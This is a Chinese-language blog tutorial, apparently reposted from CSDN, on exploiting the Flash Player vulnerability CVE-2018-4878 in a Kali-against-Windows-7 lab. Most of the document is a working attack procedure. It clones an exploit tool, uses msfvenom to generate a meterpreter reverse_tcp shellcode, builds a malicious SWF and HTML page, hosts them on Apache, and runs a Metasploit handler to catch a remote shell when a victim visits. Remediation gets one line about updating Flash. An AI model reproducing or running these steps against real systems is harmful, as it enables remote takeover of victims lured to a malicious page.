CVE-2018-4878 flash 漏洞利用教程


漏洞描述

  此漏洞是针对与安装flash 28.0.0.137版本及小于此版本的用户,攻击者诱导用户点击恶意网站,可直接获取shell权限。


影响版本

小于或等于 Adobe Flash Player 28.0.0.137 版本


漏洞检测

利用工具:
https://github.com/anbai-inc/CVE-2018-4878

将index.html与exploit.swf放到我们自己的web服务器上,让目标机去访问。有时能弹出计算机,有时会出现ie浏览器崩溃,估计是脚本不稳定的原因。

在这里插入图片描述

在这里插入图片描述


漏洞利用

Adobe Flash Player 28.0.0.137 下载:
https://pan.baidu.com/s/1Si3PDbR6cGwkGITJUTikYg 提取码:p9ok

攻击机:kali
目标机:windows7 +Adobe Flash Player 28.0.0.137

kali先下载利用工具:

git clone https://github.com/anbai-inc/CVE-2018-4878.git
cd CVE-2018-4878

msfvenom生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f python>./shellcode.txt

在这里插入图片描述
将shellcode.txt文本里的shellcode替换掉cve-2018-4847.py中的shellcode

在这里插入图片描述
继续修改swf和html生成路径(exp生成目录)

在这里插入图片描述
运行脚本,生成exp:

python cve-2018-4878.py 

启动apache2:

service apache2 start

复制exp到web目录:

cp exploit.swf /var/www/html/
cp index.html /var/www/html/

msf开启监听:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run


shell
whoami

当目标去访问我们生成的html时,将会获取shell权限

在这里插入图片描述


不过后面发现有时候会不成功,一样是造成ie崩溃。

在这里插入图片描述


漏洞加固

更新flash插件:https://www.flash.cn/

猜你喜欢

转载自blog.csdn.net/weixin_41924764/article/details/109263837